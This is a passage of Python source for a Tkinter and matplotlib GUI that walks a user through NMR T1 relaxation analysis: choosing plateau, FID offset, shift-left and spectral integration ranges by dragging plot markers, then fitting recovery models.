    def Clear(self):
        '''Cleanup actions to do when another temp is opened, or experiment is closed'''
        self.listbox_temperatures.delete(0, 'end')
class Frame_plot_T1_quick(tk.Frame):
    '''First interactive step of the T1 analysis for one temperature point.

    Shows four plots (temperature stability, quick-T1 curve, phases, shl)
    built from trace.Quick_T1().  The user drags a vertical marker on the
    quick-T1 plot to pick the index from which the plateau mean of T1 /
    phase / shl is computed, then confirms to advance to
    Frame_plot_T1_ranges, or interrupts to abort the analysis loop.
    '''
    def __init__(self, parent, trace):
        '''Builds the frame, runs the quick analysis, and binds global
        Left (interrupt) / Right (confirm) keys on root.'''
        tk.Frame.__init__(self, parent, bd=5)
        self.pack(side='left', fill='both', expand=True)
        #reference to parent
        self.parent = parent
        #reference to current trace:
        self.trace = trace
        #starting index of the plateau, remembered from the previous point
        self.range = self.parent.temperatures.previous_t1['mean_range'][0]
        #load widgets
        self.Widgets()
        #run quick t1
        quick_tables = trace.Quick_T1()
        self.Fill_plots(*quick_tables)
        #take focus away from listbox
        self.focus()
        #global key binds
        root.bind('<Left>', self.Interrupt)
        root.bind('<Right>', self.Finish)
    def Finish(self, event=None):
        '''Saves the plateau selection onto the trace and opens the next
        analysis step (Frame_plot_T1_ranges).  Bound to <Right>.'''
        #save data
        self.trace.mean_range = (self.range, None)
        self.trace.mean_shl = int(self.mean_shl)
        self.trace.mean_phase = self.mean_phase
        #remember the selection for the next point, capped at 19 —
        #presumably to keep the default inside shorter tau lists (TODO confirm)
        self.parent.temperatures.previous_t1['mean_range']=(min(self.range,19), None)
        #hide this frame
        self.pack_forget()
        #close plots
        plt.close('all')
        #forget global key bind
        root.unbind('<Right>')
        root.unbind('<Left>')
        #run next frame
        self.parent.plot_t1_ranges = Frame_plot_T1_ranges(self.parent, self.trace)
    def Interrupt(self, event=None):
        '''Aborts this point: destroys the frame and releases the
        temperatures-loop wait gate.  Bound to <Left>.'''
        #Destroy frame and plots
        self.pack_forget()
        self.destroy()
        plt.close('all')
        #unbind global keys
        root.unbind('<Right>')
        root.unbind('<Left>')
        #stop the analysis loop
        self.parent.temperatures.wait.set(False)
    def Widgets(self):
        '''Builds all the subframes, canvases and buttons (no data yet;
        Fill_plots draws the actual curves).'''
        #split in two half frames
        self.frame_left = tk.Frame(self)
        self.frame_right = tk.Frame(self)
        self.frame_left.pack(side='left', fill='y')
        self.frame_right.pack(side='left', fill='y')
        #add frames on left side
        self.frame_left1 = tk.Frame(self.frame_left, bd=5)
        self.frame_left2 = tk.Frame(self.frame_left, bd=5)
        self.frame_left3 = tk.Frame(self.frame_left, bd=5)
        self.frame_left1.pack(side='top')
        self.frame_left2.pack(side='top')
        self.frame_left3.pack(side='top', fill='x')
        #add frames on right side
        self.frame_right1 = tk.Frame(self.frame_right, bd=5)
        self.frame_right2 = tk.Frame(self.frame_right, bd=5)
        self.frame_right1.pack(side='top')
        self.frame_right2.pack(side='top')
        #add canvases and toolbars
        #plot 1
        self.fig_left1 = plt.figure(dpi=100, figsize=(7,3))
        self.fig_left1.subplots_adjust(bottom=0.20, left= 0.14, right=0.96, top=0.88)
        self.fig_left1.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
        self.canvas_left1 = FigureCanvasTkAgg(self.fig_left1, self.frame_left1)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_left1, self.frame_left1)
        self.canvas_left1._tkcanvas.pack()
        #plot 2
        self.fig_left2 = plt.figure(dpi=100, figsize=(7,4))
        self.fig_left2.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.9)
        self.canvas_left2 = FigureCanvasTkAgg(self.fig_left2, self.frame_left2)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_left2, self.frame_left2)
        self.canvas_left2._tkcanvas.pack()
        #interrupt button
        self.button_interrupt = ttk.Button(self.frame_left3, text='Interrupt', command=self.Interrupt)
        self.button_interrupt.pack(side='left', anchor='w')
        #label and edit of mean_range
        self.frame_left3_middle = tk.Frame(self.frame_left3)
        self.frame_left3_middle.pack(anchor='center')
        self.label_mean = tk.Label(self.frame_left3_middle, text='Selected range:')
        self.label_mean.pack(side='left')
        #NOTE(review): this entry is display-only — the drag handler updates
        #it, but nothing reads a manually typed value back into self.range.
        self.entry_mean_var = tk.StringVar(self, value=self.range)
        self.entry_mean = ttk.Entry(self.frame_left3_middle,
                                    textvariable=self.entry_mean_var, width=3)
        self.entry_mean.pack(side='left')
        #plot 3
        self.fig_right1 = plt.figure(dpi=100, figsize=(7,3.5))
        self.fig_right1.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.9)
        self.canvas_right1 = FigureCanvasTkAgg(self.fig_right1, self.frame_right1)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_right1, self.frame_right1)
        self.canvas_right1._tkcanvas.pack()
        #plot 4
        self.fig_right2 = plt.figure(dpi=100, figsize=(7,3.5))
        self.fig_right2.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.9)
        self.canvas_right2 = FigureCanvasTkAgg(self.fig_right2, self.frame_right2)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_right2, self.frame_right2)
        self.canvas_right2._tkcanvas.pack()
        #add button to confirm selection
        self.button_confirm = ttk.Button(self.frame_right, text='Confirm', command=self.Finish)
        self.button_confirm.pack(side='top', anchor='ne')
    def Fill_plots(self, temp_list, temp_list2, temp_set, tau_list, t1_list, phase_list, shl_list):
        '''Draws the four diagnostic plots and wires the drag interaction.

        Arguments come unpacked from trace.Quick_T1(); presumably per-file
        lists: two temperature-sensor readings, the setpoint, tau values,
        quick-T1 signal, fitted phases and shift-left counts — TODO confirm
        against Quick_T1's definition.
        '''
        #starting plateau means from the remembered range index
        self.mean_t1 = np.mean(t1_list[self.range:])
        #unwrap removes 2*pi jumps before averaging the phases
        self.mean_phase = np.mean(np.unwrap(phase_list[self.range:]))
        self.mean_shl = np.round(np.mean(shl_list[self.range:]))
        #x axes
        n = len(tau_list)
        x_list = np.linspace(1,n,n)
        #plot 1, temperature stabillity; sensors further than 2 K from the
        #setpoint are considered irrelevant and not drawn
        self.axes_left1 = self.fig_left1.add_subplot(111)
        if abs(np.mean(temp_list) - temp_set) < 2:
            self.axes_left1.plot(x_list, temp_list, marker='.', color=colors[1], label='ITC_R1')
        if abs(np.mean(temp_list2) - temp_set) < 2:
            self.axes_left1.plot(x_list, temp_list2, marker='.', color=colors[2], label='ITC_R2')
        self.axes_left1.axhline(y=temp_set, color=colors[0], label='Set T')
        self.axes_left1.margins(0.02, 0.1)
        self.axes_left1.set_title('Temperature stabillity check')
        self.axes_left1.set_xlabel('File index')
        self.axes_left1.set_ylabel('Temperature (K)')
        self.axes_left1.legend(loc='upper right')
        self.axes_left1.grid()
        #plot 2 quick T1 points with the draggable selection marker
        self.axes_left2 = self.fig_left2.add_subplot(111)
        self.axes_left2.plot(tau_list, t1_list, 'bo', color=colors[1], label='Data')
        self.axes_left2_vline = self.axes_left2.axvline(x=tau_list[self.range],
                                                        color=colors[2], label='Select')
        self.axes_left2_hline = self.axes_left2.axhline(y=self.mean_t1, color=colors[0],
                                                        label='Plato')
        self.axes_left2.set_xscale('log')
        self.axes_left2.set_title('T1 quick check')
        self.axes_left2.set_xlabel(r'$\tau$ ($\mu$s)')
        self.axes_left2.set_ylabel('Signal')
        #legend = self.axes_left2.legend(loc='lower right')
        #legend.draggable()
        self.axes_left2.grid()
        #plot 3 quick phases
        self.axes_right1 = self.fig_right1.add_subplot(111)
        self.axes_right1.plot(x_list, np.unwrap(np.array(phase_list))*180/np.pi, marker='.',
                              color=colors[1], label='Phase')
        self.axes_right1_hline = self.axes_right1.axhline(self.mean_phase*180/np.pi, color=colors[0], label='Mean phase')
        self.axes_right1.margins(0.02, 0.1)
        self.axes_right1.set_title('Phase check')
        self.axes_right1.set_xlabel('File index')
        self.axes_right1.set_ylabel('Phase (Deg)')
        #self.axes_right1.legend(loc='lower right')
        self.axes_right1.grid()
        #plot 4 quick shl
        self.axes_right2 = self.fig_right2.add_subplot(111)
        self.axes_right2.plot(x_list, shl_list, marker='.',
                              color=colors[1], label='SHL')
        self.axes_right2_hline = self.axes_right2.axhline(self.mean_shl,
                                                          color=colors[0], label='Mean SHL')
        self.axes_right2.margins(0.02, 0.1)
        self.axes_right2.set_title('SHL check')
        self.axes_right2.set_xlabel('File index')
        self.axes_right2.set_ylabel('Shift left')
        #self.axes_right2.legend(loc='lower right')
        self.axes_right2.grid()
        #redraw canvases
        self.fig_left1.canvas.draw()
        self.fig_left2.canvas.draw()
        self.fig_right1.canvas.draw()
        self.fig_right2.canvas.draw()
        #draggable vline event
        def Drag(event):
            '''Left-button drag on plot 2: moves the selection marker,
            recomputes the plateau means and updates all mean-lines.'''
            if event.button == 1 and event.inaxes != None:
                #find the index of selected points
                self.range = np.searchsorted(tau_list, event.xdata, side='right')
                self.mean_t1 = np.mean(t1_list[self.range:])
                self.mean_phase = np.mean(np.unwrap(phase_list[self.range:]))
                self.mean_shl = np.round(np.mean(shl_list[self.range:]))
                self.entry_mean_var.set(self.range)
                #update plot
                self.axes_left2_vline.set_xdata(event.xdata)
                self.axes_left2_hline.set_ydata(self.mean_t1)
                self.axes_right1_hline.set_ydata(self.mean_phase*180/np.pi)
                self.axes_right2_hline.set_ydata(self.mean_shl)
                self.fig_left2.canvas.draw()
                self.fig_right1.canvas.draw()
                self.fig_right2.canvas.draw()
        self.axes_left2_vline_drag = self.fig_left2.canvas.mpl_connect('motion_notify_event', Drag)
class Frame_plot_T1_ranges(tk.Frame):
    '''Second interactive step of the T1 analysis for one temperature point.

    Left side: mean FID and all FIDs, where the user picks the offset
    (right mouse drag) and the shift-left/shl point (left mouse drag).
    Right side: mean spectrum and all spectra, where the user picks the
    integration range (left/right mouse drag for the two bounds).
    Confirming runs trace.Run() and opens Frame_plot_T1_view.
    '''
    def __init__(self, parent, trace):
        '''Builds the frame, draws the offset-selection plots and binds
        global Left (back) / Right (confirm) keys on root.

        parent -- the app hub frame (data, temperatures frame, plot_* slots).
        trace  -- the per-temperature trace object being analysed
                  (project type; carries mean_shl/mean_phase from the
                  previous step).
        '''
        tk.Frame.__init__(self, parent, bd=5)
        self.pack(side='left', fill='both', expand=True)
        #reference to parent
        self.parent = parent
        #reference to current trace:
        self.trace = trace
        #start from parameters remembered from the previous point
        self.offset_select = self.parent.temperatures.previous_t1['offset'][0]
        self.range_l_select = self.parent.temperatures.previous_t1['integral_range'][0]
        self.range_r_select = self.parent.temperatures.previous_t1['integral_range'][1]
        self.mirroring = self.parent.temperatures.previous_t1['mirroring']
        self.shl_select = self.trace.mean_shl
        #load widgets
        self.Widgets()
        #load plots and read
        self.Choose_offset(trace)
        self.focus()
        #global key bindings
        root.bind('<Left>', self.Previous)
        root.bind('<Right>', self.Confirm_offset)
    def Widgets(self):
        '''Builds all the subframes, canvases, entries and buttons.

        The three Set_* closures let the user type exact values instead of
        dragging; each parses the entry, updates the marker lines and
        redraws, showing an error dialog on non-integer input.
        '''
        def Set_offset(event=None):
            '''Entry change of offset: replot markers and store the value.'''
            try:
                self.offset_select = int(self.entry_offset.get())
                #update plot
                self.axes_left1_vline.set_xdata(self.offset_select)
                self.axes_left2_vline.set_xdata(self.offset_select)
                self.fig_left1.canvas.draw()
                self.fig_left2.canvas.draw()
            except ValueError:
                tk.messagebox.showerror('Error', 'The inserted values must be integers!')
        def Set_range(event=None):
            '''Entry change of integral range bounds: replot and store.

            NOTE(review): uses self.spc_fr, which only exists after
            Confirm_offset has run Choose_ranges — pressing Return in these
            entries before that raises AttributeError; confirm intended.
            '''
            try:
                self.range_l_select = int(self.entry_range_l_var.get())
                self.range_r_select = int(self.entry_range_r_var.get())
                self.axes_right1_vline_l.set_xdata(self.spc_fr[self.range_l_select])
                self.axes_right2_vline_l.set_xdata(self.spc_fr[self.range_l_select])
                self.axes_right1_vline_r.set_xdata(self.spc_fr[self.range_r_select])
                self.axes_right2_vline_r.set_xdata(self.spc_fr[self.range_r_select])
                self.fig_right1.canvas.draw()
                self.fig_right2.canvas.draw()
            except ValueError:
                tk.messagebox.showerror('Error', 'The inserted values must be integers!')
        def Set_shl(event=None):
            '''Entry change of shl: replot marker and store the value.'''
            try:
                #BUG FIX: previously assigned to self.shl, which nothing ever
                #read — Confirm_offset saves self.shl_select (as does the drag
                #handler), so a typed-in shl was silently discarded.
                self.shl_select = int(self.entry_shl.get())
                #update plot
                self.axes_left1_vline_shl.set_xdata(self.shl_select)
                self.axes_left2_vline_shl.set_xdata(self.shl_select)
                self.fig_left1.canvas.draw()
                self.fig_left2.canvas.draw()
            except ValueError:
                tk.messagebox.showerror('Error', 'The inserted values must be integers!')
        #split in two half frames
        self.frame_left = tk.Frame(self)
        self.frame_right = tk.Frame(self)
        self.frame_left.pack(side='left', fill='y')
        self.frame_right.pack(side='left', fill='y')
        #add frames on left side
        self.frame_left1 = tk.Frame(self.frame_left, bd=5)
        self.frame_left2 = tk.Frame(self.frame_left, bd=5)
        self.frame_left3 = tk.Frame(self.frame_left, bd=5)
        self.frame_left1.pack(side='top')
        self.frame_left2.pack(side='top')
        self.frame_left3.pack(side='top', fill='x')
        #add frames on right side
        self.frame_right1 = tk.Frame(self.frame_right, bd=5)
        self.frame_right2 = tk.Frame(self.frame_right, bd=5)
        self.frame_right3 = tk.Frame(self.frame_right, bd=5)
        self.frame_right1.pack(side='top')
        self.frame_right2.pack(side='top')
        self.frame_right3.pack(side='top', fill='x')
        #add canvases and toolbars
        #plot 1
        self.fig_left1 = plt.figure(dpi=100, figsize=(7,2.5))
        self.fig_left1.subplots_adjust(bottom=0.20, left= 0.10, right=0.96, top=0.88)
        self.fig_left1.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
        self.canvas_left1 = FigureCanvasTkAgg(self.fig_left1, self.frame_left1)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_left1, self.frame_left1)
        self.canvas_left1._tkcanvas.pack()
        #plot 2
        self.fig_left2 = plt.figure(dpi=100, figsize=(7,4.5))
        self.fig_left2.subplots_adjust(bottom=0.12, left= 0.10, right=0.96, top=0.93)
        self.canvas_left2 = FigureCanvasTkAgg(self.fig_left2, self.frame_left2)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_left2, self.frame_left2)
        self.canvas_left2._tkcanvas.pack()
        #buttons left
        self.button_previous = ttk.Button(self.frame_left3, text='Repeat previous', command=self.Previous)
        self.button_previous.pack(side='left')
        self.button_confirm = ttk.Button(self.frame_left3, text='Confirm', command=self.Confirm_offset)
        self.button_confirm.pack(side='right')
        #check button for mirroring fid
        self.check_mirroring_var = tk.BooleanVar(self, False)
        if self.mirroring:
            self.check_mirroring_var.set(True)
        self.check_mirroring = (ttk.Checkbutton(self.frame_left3, variable=self.check_mirroring_var))
        self.check_mirroring.pack(side='right')
        self.label_mirroring = tk.Label(self.frame_left3, text='Mirroring')
        self.label_mirroring.pack(side='right')
        #middle frame: offset and shl entries with Set buttons
        self.frame_left3_middle = tk.Frame(self.frame_left3)
        self.frame_left3_middle.pack(anchor='center')
        self.label_offset = tk.Label(self.frame_left3_middle, text='Selected offset:')
        self.label_offset.pack(side='left')
        self.entry_offset_var = tk.StringVar(self, value=self.offset_select)
        self.entry_offset = ttk.Entry(self.frame_left3_middle,
                                      textvariable=self.entry_offset_var, width=5)
        self.entry_offset.pack(side='left')
        self.entry_offset.bind('<Return>', Set_offset)
        self.button_set_offset = ttk.Button(self.frame_left3_middle,
                                            text='Set offset', command=Set_offset)
        self.button_set_offset.pack(side='left')
        self.label_shl = tk.Label(self.frame_left3_middle, text='Selected shl:')
        self.label_shl.pack(side='left')
        self.entry_shl_var = tk.StringVar(self, value=self.shl_select)
        self.entry_shl = ttk.Entry(self.frame_left3_middle,
                                   textvariable=self.entry_shl_var, width=5)
        self.entry_shl.pack(side='left')
        self.entry_shl.bind('<Return>', Set_shl)
        self.button_set_shl = ttk.Button(self.frame_left3_middle,
                                         text='Set shl', command=Set_shl)
        self.button_set_shl.pack(side='left')
        #plot 3
        self.fig_right1 = plt.figure(dpi=100, figsize=(7,2.5))
        self.fig_right1.subplots_adjust(bottom=0.20, left= 0.10, right=0.96, top=0.88)
        self.canvas_right1 = FigureCanvasTkAgg(self.fig_right1, self.frame_right1)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_right1, self.frame_right1)
        self.canvas_right1._tkcanvas.pack()
        #plot 4
        self.fig_right2 = plt.figure(dpi=100, figsize=(7,4.5))
        self.fig_right2.subplots_adjust(bottom=0.12, left= 0.10, right=0.96, top=0.93)
        self.canvas_right2 = FigureCanvasTkAgg(self.fig_right2, self.frame_right2)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_right2, self.frame_right2)
        self.canvas_right2._tkcanvas.pack()
        #buttons right: integral range entries and final Confirm (enabled
        #only after the offset step is confirmed)
        self.label_range = tk.Label(self.frame_right3, text='Selected ranges:')
        self.label_range.pack(side='left')
        self.entry_range_l_var = tk.StringVar(self, value=self.range_l_select)
        self.entry_range_l = ttk.Entry(self.frame_right3,
                                       textvariable=self.entry_range_l_var, width=5)
        self.entry_range_l.pack(side='left')
        self.entry_range_l.bind('<Return>', Set_range)
        self.label_range_comma = tk.Label(self.frame_right3, text=' , ')
        self.label_range_comma.pack(side='left')
        self.entry_range_r_var = tk.StringVar(self, value=self.range_r_select)
        self.entry_range_r = ttk.Entry(self.frame_right3,
                                       textvariable=self.entry_range_r_var, width=5)
        self.entry_range_r.pack(side='left')
        self.entry_range_r.bind('<Return>', Set_range)
        self.button_set_range = ttk.Button(self.frame_right3, text='Set range', command=Set_range)
        self.button_set_range.pack(side='left')
        self.button_close = ttk.Button(self.frame_right3, text='Confirm',
                                       command=self.Close, state='disabled')
        self.button_close.pack(side='right')
    #button commands
    def Previous(self, event=None):
        '''Goes back to the quick-T1 step: re-packs the previous frame and
        destroys this one.  Bound to <Left>.

        NOTE(review): the quick frame's own <Left>/<Right> bindings are not
        re-established here, so the shortcuts are inactive after going back —
        confirm whether that is intended.
        '''
        #reload offset
        self.parent.plot_t1_quick.pack(side='left', fill='both', expand=True)
        #destroy me
        self.pack_forget()
        self.destroy()
        #unbind global keys
        root.unbind('<Right>')
        root.unbind('<Left>')
    def Confirm_offset(self, event=None):
        '''Saves offset/shl/mirroring onto the trace, remembers them for the
        next point, then switches the frame to integral-range selection.'''
        self.trace.offset_range = (self.offset_select, None)
        self.trace.mean_shl = self.shl_select
        self.parent.temperatures.previous_t1['offset'] = (self.offset_select, None)
        #remember mirroring
        self.parent.temperatures.previous_t1['mirroring'] = self.check_mirroring_var.get()
        self.trace.mirroring = self.check_mirroring_var.get()
        #run integral ranges select and clean up buttons
        self.Choose_ranges(self.trace)
        self.button_confirm.config(state='disabled')
        self.button_close.config(state='enabled')
        self.button_close.focus_set()
        #change global keys: <Right> now finishes the whole step
        root.bind('<Right>', self.Close)
    def Close(self, event=None):
        '''Saves the integral ranges, runs the full analysis (trace.Run()),
        tears down both analysis frames and opens the review frame.'''
        #save the integral ranges
        self.trace.integral_range = (self.range_l_select, self.range_r_select)
        self.parent.temperatures.previous_t1['integral_range'] = (self.range_l_select,
                                                                  self.range_r_select)
        #finish the analysis
        self.trace.Run()
        #unpack and destroy
        self.trace.analysed = True
        self.parent.plot_t1_quick.destroy()
        self.pack_forget()
        self.destroy()
        plt.close('all')
        #unbind global keys
        root.unbind('<Right>')
        root.unbind('<Left>')
        #load the overview frame
        self.parent.plot_t1_view = Frame_plot_T1_view(self.parent, self.trace)
        #self.parent.plot_t1_view.pack(side='left', fill='both', expand=True)
    def Choose_offset(self, trace):
        '''Loads all FIDs of the trace and draws the left-side plots with
        draggable shl (left button) and offset (right button) markers.'''
        fids = list()
        for file in trace.file_list:
            fid = FID(file, trace.file_dir)
            fids.append(fid.x)
        #mean over the plateau files chosen in the quick step
        x_mean = np.mean(fids[slice(*trace.mean_range)], axis=0)
        #plot 1
        self.axes_left1 = self.fig_left1.add_subplot(111)
        self.axes_left1.plot(np.real(x_mean), color=colors[1], label='Re')
        self.axes_left1.plot(np.imag(x_mean), color=colors[2], label='Im')
        self.axes_left1.plot(np.abs(x_mean), color=colors[0], label='Abs')
        self.axes_left1_vline_shl = self.axes_left1.axvline(x=trace.mean_shl, color=colors[-1])
        self.axes_left1_vline = self.axes_left1.axvline(x=self.offset_select, color=colors[4])
        self.axes_left1.margins(0.02, 0.1)
        self.axes_left1.set_title('Mean FID')
        self.axes_left1.set_xlabel('Time (index)')
        self.axes_left1.set_ylabel('Signal (A.U.)')
        #self.axes_left1.legend(loc='upper right')
        self.axes_left1.grid()
        #plot 2: every FID, vertically offset for visibility, x shared
        self.axes_left2 = self.fig_left2.add_subplot(111, sharex=self.axes_left1)
        for i, fid in enumerate(fids):
            self.axes_left2.plot(np.abs(fid)+np.amax(np.abs(x_mean))*0.5*i,
                                 color=colors[i%9], label=str(i))
        self.axes_left2_vline_shl = self.axes_left2.axvline(x=trace.mean_shl, color=colors[-1], label='shl')
        self.axes_left2_vline = self.axes_left2.axvline(x=self.offset_select,
                                                        color=colors[4], label='Select')
        self.axes_left2.margins(0.02, 0.02)
        self.axes_left2.set_title('All FIDs')
        self.axes_left2.set_xlabel('Time (index)')
        self.axes_left2.set_ylabel('Absolute signal (A.U.)')
        self.axes_left2.grid()
        #draggable vline event
        def Drag(event):
            '''Left button drags the shl marker, right button the offset
            marker; both update the entry fields and redraw.'''
            if event.button == 1 and event.inaxes != None:
                #find the index of selected points
                self.shl_select = int(event.xdata)
                self.entry_shl_var.set(self.shl_select)
                #update plot
                self.axes_left1_vline_shl.set_xdata(event.xdata)
                self.axes_left2_vline_shl.set_xdata(event.xdata)
                self.fig_left1.canvas.draw()
                self.fig_left2.canvas.draw()
            if event.button == 3 and event.inaxes != None:
                #find the index of selected points
                self.offset_select = int(event.xdata)
                self.entry_offset_var.set(self.offset_select)
                #update plot
                self.axes_left1_vline.set_xdata(event.xdata)
                self.axes_left2_vline.set_xdata(event.xdata)
                self.fig_left1.canvas.draw()
                self.fig_left2.canvas.draw()
        self.axes_left1_vline_drag = self.fig_left1.canvas.mpl_connect('motion_notify_event', Drag)
        self.axes_left2_vline_drag = self.fig_left2.canvas.mpl_connect('motion_notify_event', Drag)
    def Choose_ranges(self, trace):
        '''Processes all FIDs to spectra with the confirmed offset/shl/phase
        and draws the right-side plots with draggable integral-range bounds
        (left button = left bound, right button = right bound).'''
        spcs = list()
        for file in trace.file_list:
            fid = FID(file, trace.file_dir)
            fid.Offset(trace.offset_range)
            fid.Shift_left(trace.mean_shl, mirroring=trace.mirroring)
            fid.Fourier()
            fid.Phase_rotate(trace.mean_phase)
            spcs.append(fid.spc)
        #frequency axis of the last FID (all files share it, presumably)
        spc_fr = fid.spc_fr
        self.spc_fr = spc_fr
        spc_mean = np.mean(spcs[slice(*trace.mean_range)], axis=0)
        #plot 3
        self.axes_right1 = self.fig_right1.add_subplot(111)
        self.axes_right1.plot(spc_fr, np.real(spc_mean), color=colors[1], label='Re')
        self.axes_right1.plot(spc_fr, np.imag(spc_mean), color=colors[2], label='Im')
        self.axes_right1.axvline(x=trace.fr, color=colors[-1])
        self.axes_right1_vline_l = self.axes_right1.axvline(x=spc_fr[self.range_l_select],
                                                            color=colors[4])
        self.axes_right1_vline_r = self.axes_right1.axvline(x=spc_fr[self.range_r_select],
                                                            color=colors[4])
        self.axes_right1.set_xlim((trace.fr -0.5,+ trace.fr +0.5))
        self.axes_right1.set_title('Mean spectrum (Drag with left and right mouse button)')
        self.axes_right1.set_xlabel('Frequency (MHz)')
        self.axes_right1.set_ylabel('Signal (A.U.)')
        self.axes_right1.legend(loc='upper left')
        self.axes_right1.grid()
        #plot 4: every spectrum, vertically offset for visibility
        self.axes_right2 = self.fig_right2.add_subplot(111)
        for i, spc in enumerate(spcs):
            self.axes_right2.plot(spc_fr, np.real(spc)+np.amax(np.abs(spc_mean))*0.5*i,
                                  color=colors[i%9], label=str(i))
        #BUG FIX: the trace.fr marker was drawn on axes_right1 again
        #(duplicating the line above) instead of on this plot.
        self.axes_right2.axvline(x=trace.fr, color=colors[-1])
        self.axes_right2_vline_l = self.axes_right2.axvline(x=spc_fr[self.range_l_select],
                                                            color=colors[4])
        self.axes_right2_vline_r = self.axes_right2.axvline(x=spc_fr[self.range_r_select],
                                                            color=colors[4])
        self.axes_right2.set_xlim((trace.fr -0.5,+ trace.fr +0.5))
        self.axes_right2.margins(0.02, 0.02)
        self.axes_right2.set_title('All FIDs')
        self.axes_right2.set_xlabel('Frequency (MHz)')
        self.axes_right2.set_ylabel('Real part of signal (A.U.)')
        self.axes_right2.grid()
        #draggable vline event
        def Drag(event):
            '''Left button moves the left bound, right button the right
            bound; indices found via searchsorted on the frequency axis.'''
            if event.button == 1 and event.inaxes != None:
                #find the index of selected points
                self.range_l_select = np.searchsorted(spc_fr, event.xdata, side='left')
                self.entry_range_l_var.set(self.range_l_select)
                #update plot
                self.axes_right1_vline_l.set_xdata(event.xdata)
                self.axes_right2_vline_l.set_xdata(event.xdata)
                self.fig_right1.canvas.draw()
                self.fig_right2.canvas.draw()
            if event.button == 3 and event.inaxes != None:
                #find the index of selected points
                self.range_r_select = np.searchsorted(spc_fr, event.xdata, side='right')
                self.entry_range_r_var.set(self.range_r_select)
                #update plot
                self.axes_right1_vline_r.set_xdata(event.xdata)
                self.axes_right2_vline_r.set_xdata(event.xdata)
                self.fig_right1.canvas.draw()
                self.fig_right2.canvas.draw()
        self.axes_right1_vline_drag = self.fig_right1.canvas.mpl_connect('motion_notify_event', Drag)
        self.axes_right2_vline_drag = self.fig_right2.canvas.mpl_connect('motion_notify_event', Drag)
        self.fig_right1.canvas.draw()
        self.fig_right2.canvas.draw()
class Frame_plot_T1_view(tk.Frame):
    '''Per-temperature T1 fit screen.

    Shows the measured T1 recovery trace for one temperature point, a
    table of trace parameters, and a fitting panel with a selectable
    relaxation model (single/double exponential and several
    quadrupolar spin models).
    '''
    def __init__(self, parent, trace):
        '''Makes the subframe and fills it up.

        parent -- owning widget; also provides .temperatures (used by
                  Confirm/Change_fit) and .current_experiment (Export)
        trace  -- T1 trace object holding tau_list/area_list and the
                  fit state written back by Fit()
        '''
        tk.Frame.__init__(self, parent)
        self.pack(side='left', anchor='n')
        #reference to parent
        self.parent = parent
        #reference to current trace:
        self.trace = trace
        #load widgets
        self.Widgets()
        #global key bind (root is the module-level Tk instance)
        root.bind('<Right>', self.Confirm)
    def Widgets(self):
        '''Builds all the subframes and canvases'''
        #button commands
        def Disable(event=None):
            '''Disables and red-flags the point to avoid plotting'''
            #try:
            self.trace.disabled = not self.trace.disabled
            #except:
            #    self.trace.disabled = True
            self.Refresh_parameters()
        def Repeat(event=None):
            '''Clears the T1 trace and starts the analysis from scratch'''
            self.trace.Reinit()
            self.Confirm()
            #mark unanalysed AFTER Confirm so the analysis loop picks
            #this point up again
            self.trace.analysed = False
        #bottom button row
        self.frame_bottom = tk.Frame(self)
        self.frame_bottom.pack(side='bottom', fill='x')
        #split in columns
        self.frame_parameters = tk.Frame(self, bd=5)
        self.frame_parameters.pack(side='left', anchor='n')
        self.frame_plot = tk.Frame(self, bd=5)
        self.frame_plot.pack(side='left', anchor='n')
        #parameters
        self.label_parameters = tk.Label(self.frame_parameters, text='Parameters')
        self.label_parameters.pack(side='top')
        self.tree_columns = ('Name','Value')
        self.tree_parameters = ttk.Treeview(self.frame_parameters, columns=self.tree_columns,
                                 show='headings', selectmode='none', height=25)
        self.tree_parameters.pack(side='top',fill='y', expand=True)
        #define column widths
        self.tree_parameters.column('Name', width=80)
        self.tree_parameters.column('Value', width=120)
        #define column names
        for column in self.tree_columns:
            self.tree_parameters.heading(column, text=column)
        #display in degrees
        self.trace.mean_phase_deg = self.trace.mean_phase*180/np.pi
        #fill in params
        self.Refresh_parameters()
        # disable point button
        self.button_disable = ttk.Button(self.frame_parameters, text='Disable/enable Point',
                                         command=Disable, width=20)
        self.button_disable.pack(side='top')
        #redo analysis button
        self.button_repeat = ttk.Button(self.frame_parameters, text='Repeat analysis',
                                        command=Repeat, width=20)
        self.button_repeat.pack(side='top')
        #T1 plot
        self.fig_t1 = plt.figure(dpi=100, figsize=(8,6))
        self.fig_t1.subplots_adjust(bottom=0.1, left= 0.10, right=0.96, top=0.94)
        self.fig_t1.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
        #self.fig_t1.text(0.82, 0.97, r'$y_0(1-(1-s) \exp(-(\frac{x}{T_1})^r))$', horizontalalignment='center', verticalalignment='center')
        self.canvas_t1 = FigureCanvasTkAgg(self.fig_t1, self.frame_plot)
        self.canvas_t1._tkcanvas.pack()
        self.Fill_plot()
        self.Fitting_frame()
    def Fitting_frame(self, event=None):
        '''Repacks/initializes the fitting frame for the selected fitting function'''
        #repack if existing:
        try:
            self.frame_fit.destroy()
        except:
            pass
        #fit frame
        self.frame_fit = tk.Frame(self, bd=5)
        self.frame_fit.pack(side='left', anchor='n', fill='y')
        #fit functions -- magnetization recovery models; x is the
        #recovery delay tau, T1 the relaxation time, y0 the equilibrium
        #signal, s the saturation factor, r the stretch exponent
        def Fit_exponential(x, T1=0.001, y0=1000, s=1, r=1):
            '''T1 exponential fit model'''
            return y0*(1-(1+s)*np.exp(-(x/T1)**r))
        def Fit_spin_3_2(x, T1=0.001, y0=1000, s=1, r=1):
            '''T1 fit model for spin 3/2'''
            return y0*(1-(1+s)*(0.1*np.exp(-(x/T1)**r)+0.9*np.exp(-(6*x/T1)**r)))
        def Fit_spin_3_2_dbl(x, T11=0.001, T12=0.001, y0=1000, s1=1, s2=1, r=1):
            '''T1 fit model for spin 3/2'''
            return y0*(1-(1+s1)*(0.1*np.exp(-(x/T11)**r)+0.9*np.exp(-(6*x/T11)**r)) \
